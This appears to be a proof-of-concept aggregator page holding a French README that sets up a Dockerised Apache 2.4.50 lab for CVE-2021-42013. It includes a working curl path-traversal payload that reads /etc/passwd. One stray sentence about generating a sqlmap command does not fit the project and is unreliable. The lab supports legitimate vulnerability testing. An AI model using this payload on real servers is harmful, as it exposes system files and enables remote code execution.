POC详情: 08af1ad42ce8463df941dbbe95d004277a2c79eb

来源
关联漏洞
标题: Apache HTTP Server 安全漏洞 (CVE-2021-42013)
描述:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别
描述
CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities  in Apache 2.4.49 and 2.4.50
介绍
# Dockerisation d'une Vulnérabilité : cve-2021-42013

Ce projet vise à dockeriser une vulnérabilité spécifique en utilisant Docker. L'objectif est de créer un environnement isolé dans lequel la vulnérabilité peut être exploitée et testée de manière sécurisée.

## Application vulnérable

Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal

## Installation

Pour exécuter ce projet, vous devez avoir sur votre machine :

- [Docker](https://www.docker.com/)
- [Python](https://www.python.org/)
- [Curl](https://curl.se/)


Une fois les prérequis installé, vous pouvez cloner ce dépôt Git sur votre machine :

```bash
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

```

Une fois dans le répertoire, exécuter la commande si dessous pour mettre en place l'environement vulnérable:

```bash
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

```

Accéder ensuite à l'application à l'adresse http://localhost:8000
Si tout va bien, vous devez voir s'afficher "It works"




## Exploitation de la vulnérabilité

L'exécution de ce payload avec `curl` ci dessous nous montre que la cible est vulnérable. Le script générera la commande sqlmap appropriée pour exploiter la vulnérabilité

```bash
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

```
Ce payload peut accéder directement aux informations relatives à l'utilisateur dans le système sans le consentement de l'utilisateur.

Une fois que nous aurons activé les mods cgi ou cgid sur le serveur, cette vulnérabilité permettra à un attaquant d'exécuter des commandes arbitraires
文件快照

[4.0K] /data/pocs/08af1ad42ce8463df941dbbe95d004277a2c79eb ├── [ 422] Dockerfile ├── [ 18K] httpd.conf └── [1.7K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。